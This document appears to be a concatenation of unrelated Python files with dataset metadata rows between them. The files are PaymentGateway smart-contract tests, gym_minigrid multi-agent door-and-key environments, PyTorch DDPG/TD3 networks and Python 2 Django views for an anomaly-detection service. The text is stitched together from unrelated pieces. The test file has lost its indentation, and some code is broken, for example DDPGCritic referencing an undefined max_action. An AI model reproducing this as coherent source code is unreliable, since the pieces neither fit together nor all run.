encrypted_message = 'encrypted_message'
encrypted_message_after = 'encrypted_message_after'
terms_text = 'terms_sample\nend'
terms_text_after = 'terms_sample\nafter\nend'
# TEST_deploy
class TestDeploy:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
assert payment_account[1] == brownie.ZERO_ADDRESS
assert payment_account[2] == ''
assert payment_account[3] == 0
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
# TEST_register
class TestRegister:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
tx = pg_contract.register.transact(
agent,
encrypted_message,
{'from': trader}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 1
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
assert tx.events['Register']['account_address'] == trader.address
assert tx.events['Register']['agent_address'] == agent.address
# Normal_2
# Multiple registrations
def test_normal_2(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register (1)
pg_contract.register.transact(
agent,
encrypted_message,
{'from': trader}
)
# register (2)
pg_contract.register.transact(
agent,
encrypted_message_after,
{'from': trader}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message_after
assert payment_account[3] == 1
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
#######################################
# Error
#######################################
# Error_1
# If approval_status = 4 (BAN), registration is not possible.
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register (1)
pg_contract.register.transact(
agent,
encrypted_message,
{'from': trader}
)
# ban
pg_contract.ban.transact(trader, {'from': agent})
# register (2)
with brownie.reverts():
pg_contract.register.transact(
agent,
encrypted_message_after,
{'from': trader}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 4
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
# TEST_modify
class TestModify:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(
agent,
encrypted_message,
{'from': trader}
)
# modify
tx = pg_contract.modify.transact(
trader,
encrypted_message_after,
{'from': agent}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message_after
assert payment_account[3] == 1
assert tx.events['Modify']['account_address'] == trader.address
assert tx.events['Modify']['agent_address'] == agent.address
#######################################
# Error
#######################################
# Error_1
# Not registered
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# modify
with brownie.reverts():
pg_contract.modify.transact(
trader,
encrypted_message_after,
{'from': agent}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
assert payment_account[1] == brownie.ZERO_ADDRESS
assert payment_account[2] == ''
assert payment_account[3] == 0
# Error_2
# Unauthorized
def test_error_2(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(
agent,
encrypted_message,
{'from': trader}
)
# modify
with brownie.reverts():
pg_contract.modify.transact(
trader,
encrypted_message_after,
{'from': trader}
)
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 1
# TEST_approve
class TestApprove:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(agent, encrypted_message, {'from': trader})
# approve
tx = pg_contract.approve.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 2
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is True
assert tx.events['Approve']['account_address'] == trader.address
assert tx.events['Approve']['agent_address'] == agent.address
#######################################
# Error
#######################################
# Error_1
# Not registered
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# approve
with brownie.reverts():
pg_contract.approve.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
# TEST_warn
class TestWarn:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(agent, encrypted_message, {'from': trader})
# warn
tx = pg_contract.warn.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 3
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
assert tx.events['Warn']['account_address'] == trader.address
assert tx.events['Warn']['agent_address'] == agent.address
#######################################
# Error
#######################################
# Error_1
# Not registered
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# warn
with brownie.reverts():
pg_contract.warn.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
# TEST_disapprove
class TestDisapprove:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(agent, encrypted_message, {'from': trader})
# disapprove
tx = pg_contract.disapprove.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 1
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
assert tx.events['Disapprove']['account_address'] == trader.address
assert tx.events['Disapprove']['agent_address'] == agent.address
# Normal_2
# register -> approve -> disapprove
def test_normal_2(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(agent, encrypted_message, {'from': trader})
# approve
pg_contract.approve.transact(trader, {'from': agent})
# disapprove
pg_contract.disapprove.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 1
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
#######################################
# Error
#######################################
# Error_1
# Not registered
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# disapprove
with brownie.reverts():
pg_contract.disapprove.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
# TEST_ban
class TestBan:
#######################################
# Normal
#######################################
# Normal_1
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# register
pg_contract.register.transact(agent, encrypted_message, {'from': trader})
# ban
tx = pg_contract.ban.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == trader
assert payment_account[1] == agent
assert payment_account[2] == encrypted_message
assert payment_account[3] == 4
account_approved = pg_contract.accountApproved(trader, agent)
assert account_approved is False
assert tx.events['Ban']['account_address'] == trader.address
assert tx.events['Ban']['agent_address'] == agent.address
#######################################
# Error
#######################################
# Error_1
# Not registered
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
trader = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# ban
with brownie.reverts():
pg_contract.ban.transact(trader, {'from': agent})
# assertion
payment_account = pg_contract.payment_accounts(trader, agent)
assert payment_account[0] == brownie.ZERO_ADDRESS
# TEST_addAgent
class TestAddAgent:
#######################################
# Normal
#######################################
# Normal_1
# Default value
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# assertion
agent_available = pg_contract.getAgent(brownie.ZERO_ADDRESS)
assert agent_available == False
# Normal_2
# Add new agent
def test_normal_2(self, PaymentGateway, users):
admin = users['admin']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# add agent
tx = pg_contract.addAgent.transact(agent, {'from': admin})
# assertion
agent_available = pg_contract.getAgent(agent)
assert agent_available == True
assert tx.events['AddAgent']['agent_address'] == agent.address
# Normal_3
# Add multiple agents
def test_normal_3(self, PaymentGateway, users):
admin = users['admin']
agent_1 = users['user1']
agent_2 = users['user2']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# add agent 1
pg_contract.addAgent.transact(agent_1, {'from': admin})
# add agent 2
pg_contract.addAgent.transact(agent_2, {'from': admin})
# assertion
agent_1_available = pg_contract.getAgent(agent_1)
assert agent_1_available == True
agent_2_available = pg_contract.getAgent(agent_2)
assert agent_2_available == True
#######################################
# Error
#######################################
# Error_1
# Unauthorized
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
attacker = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# add agent
with brownie.reverts():
pg_contract.addAgent.transact(agent, {'from': attacker})
# assertion
agent_available = pg_contract.getAgent(agent)
assert agent_available == False
# TEST_removeAgent
class TestRemoveAgent:
#######################################
# Normal
#######################################
# Normal_1
# No data
def test_normal_1(self, PaymentGateway, users):
admin = users['admin']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# remove agent
tx = pg_contract.removeAgent.transact(agent, {'from': admin})
# assertion
agent_available = pg_contract.getAgent(agent)
assert agent_available == False
assert tx.events['RemoveAgent']['agent_address'] == agent.address
# Normal_2
def test_normal_2(self, PaymentGateway, users):
admin = users['admin']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# add agent
pg_contract.addAgent.transact(agent, {'from': admin})
# remove agent
tx = pg_contract.removeAgent.transact(agent, {'from': admin})
# assertion
agent_available = pg_contract.getAgent(agent)
assert agent_available == False
assert tx.events['RemoveAgent']['agent_address'] == agent.address
#######################################
# Error
#######################################
# Error_1
# Unauthorized
def test_error_1(self, PaymentGateway, users):
admin = users['admin']
attacker = users['trader']
agent = users['agent']
# deploy
pg_contract = admin.deploy(PaymentGateway)
# add agent
pg_contract.addAgent.transact(agent, {'from': admin})
# remove agent
with brownie.reverts():
pg_contract.removeAgent.transact(agent, {'from': attacker})
# assertion
agent_available = pg_contract.getAgent(agent)
assert agent_available == True
| 28.364568 | 81 | 0.571569 | 1,870 | 19,373 | 5.726203 | 0.07861 | 0.084983 | 0.097124 | 0.060702 | 0.866362 | 0.843388 | 0.826952 | 0.786515 | 0.781939 | 0.77755 | 0 | 0.009551 | 0.270428 | 19,373 | 682 | 82 | 28.406158 | 0.748054 | 0.104166 | 0 | 0.812308 | 0 | 0 | 0.054922 | 0.00296 | 0 | 0 | 0 | 0 | 0.258462 | 1 | 0.070769 | false | 0 | 0.003077 | 0 | 0.101538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd254f32b439fb7a7e5f49b648ff413c42f19836 | 7,097 | py | Python | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | from gym_minigrid.roomgrid import RoomGrid, MARoomGrid, CommMARoomGrid
from gym_minigrid.register import register
from gym_minigrid.minigrid import IDX_TO_COLOR, COLOR_NAMES, Door, Goal
class MAUnlockDoorGoal(MARoomGrid):
"""
Colored goals are placed behind locked doors of the same color.
Agents need to pick up their colored key and go to their respective
goal to receive their reward. Episode ends when all agents get to
their colored goal.
"""
def __init__(
self,
seed=None,
num_agents=2
):
self.num_agents = num_agents
super().__init__(
room_size=3,
num_rows=num_agents,
max_steps=30*3**2,
seed=seed,
)
def _gen_grid(self, width, height):
super()._gen_grid(width, height)
potential_colors = [IDX_TO_COLOR[i] for i in range(min(self.num_agents, len(COLOR_NAMES)))]
key_rows = [i for i in range(self.num_rows)]
locked_door_rows = [i for i in range(self.num_rows)]
self.goal_poses = {}
# Add keys, goals, and locked doors
for curr_color in potential_colors:
curr_key_row = self._rand_elem(key_rows)
key_rows.remove(curr_key_row)
self.add_object(0, curr_key_row, 'key', curr_color)
curr_locked_door_row = self._rand_elem(locked_door_rows)
locked_door_rows.remove(curr_locked_door_row)
curr_goal, curr_goal_pos = self.add_object(2, curr_locked_door_row, 'goal', None)
curr_goal.color = curr_color
self.goal_poses[curr_color] = curr_goal_pos
self.add_door(2, curr_locked_door_row, 2, color=curr_color, locked=True)
# Remove walls
for j in range(1, self.num_rows):
self.remove_wall(0, j, 3)
self.remove_wall(1, j, 3)
for j in range(1, self.grid.height - 1):
self.grid.set(2, j, None)
# Place the agents in the middle
self.agent_poses = []
self.agent_dirs = []
for _ in range(self.num_agents):
self.place_agent(1)
self.agent_poses = self.agent_poses[ : self.num_agents]
self.agent_dirs = self.agent_dirs[ : self.num_agents]
self.mission = "get to your respective colored goal"
def step(self, action):
obs, _, done, info = super().step(action)
rewards = []
done = True
for agent_id, agent_pos in enumerate(self.agent_poses):
if agent_pos[0] == self.goal_poses[IDX_TO_COLOR[agent_id]][0] and agent_pos[1] == self.goal_poses[IDX_TO_COLOR[agent_id]][1]:
rewards.append(1)
else:
rewards.append(0)
done = False
return obs, rewards, done, info
class CommMAUnlockDoorGoal(CommMARoomGrid):
"""
Colored goals are placed behind locked doors of the same color.
Agents need to pick up their colored key and go to their respective
goal to receive their reward. Episode ends when all agents get to
their colored goal.
"""
def __init__(
self,
seed=None,
num_agents=2
):
self.num_agents = num_agents
super().__init__(
room_size=3,
num_rows=num_agents,
max_steps=30*3**2,
seed=seed,
)
def _gen_grid(self, width, height):
super()._gen_grid(width, height)
potential_colors = [IDX_TO_COLOR[i] for i in range(min(self.num_agents, len(COLOR_NAMES)))]
key_rows = [i for i in range(self.num_rows)]
locked_door_rows = [i for i in range(self.num_rows)]
self.goal_poses = {}
# Add keys, goals, and locked doors
for curr_color in potential_colors:
curr_key_row = self._rand_elem(key_rows)
key_rows.remove(curr_key_row)
self.add_object(0, curr_key_row, 'key', curr_color)
curr_locked_door_row = self._rand_elem(locked_door_rows)
locked_door_rows.remove(curr_locked_door_row)
curr_goal, curr_goal_pos = self.add_object(2, curr_locked_door_row, 'goal', None)
curr_goal.color = curr_color
self.goal_poses[curr_color] = curr_goal_pos
self.add_door(2, curr_locked_door_row, 2, color=curr_color, locked=True)
# Remove walls
for j in range(1, self.num_rows):
self.remove_wall(0, j, 3)
self.remove_wall(1, j, 3)
for j in range(1, self.grid.height - 1):
self.grid.set(2, j, None)
# Place the agents in the middle
self.agent_poses = []
self.agent_dirs = []
for _ in range(self.num_agents):
self.place_agent(1)
self.agent_poses = self.agent_poses[ : self.num_agents]
self.agent_dirs = self.agent_dirs[ : self.num_agents]
self.mission = "get to your respective colored goal"
def step(self, action):
obs, _, done, info = super().step(action)
rewards = []
done = True
for agent_id, agent_pos in enumerate(self.agent_poses):
if agent_pos[0] == self.goal_poses[IDX_TO_COLOR[agent_id]][0] and agent_pos[1] == self.goal_poses[IDX_TO_COLOR[agent_id]][1]:
rewards.append(1)
else:
rewards.append(0)
done = False
return obs, rewards, done, info
class MAUnlockDoorGoalA1(MAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=1
)
class MAUnlockDoorGoalA2(MAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=2
)
class MAUnlockDoorGoalA3(MAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=3
)
class CommMAUnlockDoorGoalA1(CommMAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=1
)
class CommMAUnlockDoorGoalA2(CommMAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=2
)
class CommMAUnlockDoorGoalA3(CommMAUnlockDoorGoal):
def __init__(self, seed=None):
super().__init__(
seed=seed,
num_agents=3
)
register(
id='MiniGrid-MA-UnlockDoorGoalA1-v0',
entry_point='gym_minigrid.envs:MAUnlockDoorGoalA1'
)
register(
id='MiniGrid-MA-UnlockDoorGoalA2-v0',
entry_point='gym_minigrid.envs:MAUnlockDoorGoalA2'
)
register(
id='MiniGrid-MA-UnlockDoorGoalA3-v0',
entry_point='gym_minigrid.envs:MAUnlockDoorGoalA3'
)
register(
id='MiniGrid-Comm-MA-UnlockDoorGoalA1-v0',
entry_point='gym_minigrid.envs:CommMAUnlockDoorGoalA1'
)
register(
id='MiniGrid-Comm-MA-UnlockDoorGoalA2-v0',
entry_point='gym_minigrid.envs:CommMAUnlockDoorGoalA2'
)
register(
id='MiniGrid-Comm-MA-UnlockDoorGoalA3-v0',
entry_point='gym_minigrid.envs:CommMAUnlockDoorGoalA3'
)
| 31.127193 | 137 | 0.623221 | 925 | 7,097 | 4.483243 | 0.130811 | 0.047745 | 0.031348 | 0.028937 | 0.874849 | 0.858934 | 0.858934 | 0.858934 | 0.793827 | 0.793827 | 0 | 0.015662 | 0.280259 | 7,097 | 227 | 138 | 31.264317 | 0.796202 | 0.083697 | 0 | 0.778443 | 0 | 0 | 0.079621 | 0.066584 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071856 | false | 0 | 0.017964 | 0 | 0.149701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b5f76d7d1b11d713914ba71fdd2cd10bd7143ce9 | 7,397 | py | Python | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | 4 | 2021-02-03T02:44:30.000Z | 2022-01-18T15:48:22.000Z | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | null | null | null | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | 1 | 2022-01-19T01:26:00.000Z | 2022-01-19T01:26:00.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def fanin_init(size, fanin=None):
fanin = fanin or size[0]
v = 1. / np.sqrt(fanin)
return torch.Tensor(size).uniform_(-v, v)
# By default all the modules are initialized to train mode (self.training = True)
class Original_Actor(nn.Module):
def __init__(self, state_dim, action_dim, max_action, hidden_size1, hidden_size2, init_w=3e-3):
super(Original_Actor, self).__init__()
self.max_action = max_action
self.l1 = nn.Linear(state_dim, hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.l3 = nn.Linear(hidden_size2, action_dim)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
def forward(self, x):
x = F.relu(self.l1(x))
x = F.relu(self.l2(x))
x = self.max_action * torch.tanh(self.l3(x))
return x
class DDPGCritic(nn.Module):
def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
super(DDPGCritic, self).__init__()
self.max_action = max_action
self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.l3 = nn.Linear(hidden_size2, 1)
self.init_weights(init_w)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
def forward(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = F.relu(self.l2(x1))
x1 = self.l3(x1)
return x1
class TD3Critic(nn.Module):
def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
super(TD3Critic, self).__init__()
# Q1 architecture
self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.l3 = nn.Linear(hidden_size2, 1)
# Q2 architecture
self.l4 = nn.Linear(state_dim + action_dim, hidden_size1)
self.l5 = nn.Linear(hidden_size1, hidden_size2)
self.l6 = nn.Linear(hidden_size2, 1)
# init weights for both nets
self.init_weights(init_w)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
self.l4.weight.data = fanin_init(self.l4.weight.data.size())
self.l5.weight.data = fanin_init(self.l5.weight.data.size())
self.l6.weight.data.uniform_(-init_w, init_w)
def forward(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = F.relu(self.l2(x1))
x1 = self.l3(x1)
x2 = F.relu(self.l4(xu))
x2 = F.relu(self.l5(x2))
x2 = self.l6(x2)
return x1, x2
def Q1(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = F.relu(self.l2(x1))
x1 = self.l3(x1)
return x1
# Layernorm (marked by LN) used to make correlated parameter noise possible for DDPG and TD3
class LN_Actor(nn.Module):
def __init__(self, state_dim, action_dim, max_action, hidden_size1, hidden_size2, init_w=3e-3):
super(LN_Actor, self).__init__()
self.max_action = max_action
self.l1 = nn.Linear(state_dim, hidden_size1)
self.ln1 = nn.LayerNorm(hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.ln2 = nn.LayerNorm(hidden_size2)
self.l3 = nn.Linear(hidden_size2, action_dim)
self.init_weights(init_w)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
def forward(self, x):
x = F.relu(self.l1(x))
x = self.ln1(x)
x = F.relu(self.l2(x))
x = self.ln2(x)
x = torch.tanh(self.l3(x))
#x = self.max_action * torch.tanh(self.l3(x))
return x
class LN_DDPGCritic(nn.Module):
def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
super(LN_DDPGCritic, self).__init__()
self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
self.ln1 = nn.LayerNorm(hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.ln2 = nn.LayerNorm(hidden_size2)
self.l3 = nn.Linear(hidden_size2, 1)
self.init_weights(init_w)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
def forward(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = self.ln1(x1)
x1 = F.relu(self.l2(x1))
x1 = self.ln2(x1)
x1 = self.l3(x1)
return x1
# critic uses 2 action-value functions (and uses smaller one to form targets)
class LN_TD3Critic(nn.Module):
def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
super(LN_TD3Critic, self).__init__()
# Q1 architecture
self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
self.ln1 = nn.LayerNorm(hidden_size1)
self.l2 = nn.Linear(hidden_size1, hidden_size2)
self.ln2 = nn.LayerNorm(hidden_size2)
self.l3 = nn.Linear(hidden_size2, 1)
# Q2 architecture
self.l4 = nn.Linear(state_dim + action_dim, hidden_size1)
self.ln4 = nn.LayerNorm(hidden_size1)
self.l5 = nn.Linear(hidden_size1, hidden_size2)
self.ln5 = nn.LayerNorm(hidden_size2)
self.l6 = nn.Linear(hidden_size2, 1)
# init weights for both nets
self.init_weights(init_w)
def init_weights(self, init_w):
self.l1.weight.data = fanin_init(self.l1.weight.data.size())
self.l2.weight.data = fanin_init(self.l2.weight.data.size())
self.l3.weight.data.uniform_(-init_w, init_w)
self.l4.weight.data = fanin_init(self.l4.weight.data.size())
self.l5.weight.data = fanin_init(self.l5.weight.data.size())
self.l6.weight.data.uniform_(-init_w, init_w)
def forward(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = self.ln1(x1)
x1 = F.relu(self.l2(x1))
x1 = self.ln2(x1)
x1 = self.l3(x1)
x2 = F.relu(self.l4(xu))
x2 = self.ln4(x2)
x2 = F.relu(self.l5(x2))
x2 = self.ln5(x2)
x2 = self.l6(x2)
return x1, x2
def Q1(self, inputs, actions):
xu = torch.cat([inputs, actions], 1)
x1 = F.relu(self.l1(xu))
x1 = self.ln1(x1)
x1 = F.relu(self.l2(x1))
x1 = self.ln2(x1)
x1 = self.l3(x1)
return x1
| 32.585903 | 99 | 0.623361 | 1,127 | 7,397 | 3.899734 | 0.090506 | 0.091013 | 0.040956 | 0.06917 | 0.897156 | 0.888737 | 0.888737 | 0.888737 | 0.881456 | 0.87463 | 0 | 0.047738 | 0.243883 | 7,397 | 226 | 100 | 32.730089 | 0.738065 | 0.055158 | 0 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132911 | false | 0 | 0.025316 | 0 | 0.253165 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd0d7d32fc5721eab8e25a690e6cd5f08b14a0c1 | 6,649 | py | Python | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | 1 | 2018-10-21T14:55:10.000Z | 2018-10-21T14:55:10.000Z | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | null | null | null | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.shortcuts import render
from django.http import FileResponse
from common.render import render_json
from app.service.time_series_detector.anomaly_service import *
from app.service.time_series_detector.sample_service import *
from app.service.time_series_detector.task_service import *
from app.service.time_series_detector.detect_service import *
from app.config.errorcode import *
from app.utils.utils import *
def search_anomaly(request):
if request.method == "POST":
try:
anomaly_service = AnomalyService()
return_dict = anomaly_service.query_anomaly(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def import_sample(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.import_file(request.FILES)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def update_sample(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.update_sample(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def query_sample(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.query_sample(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
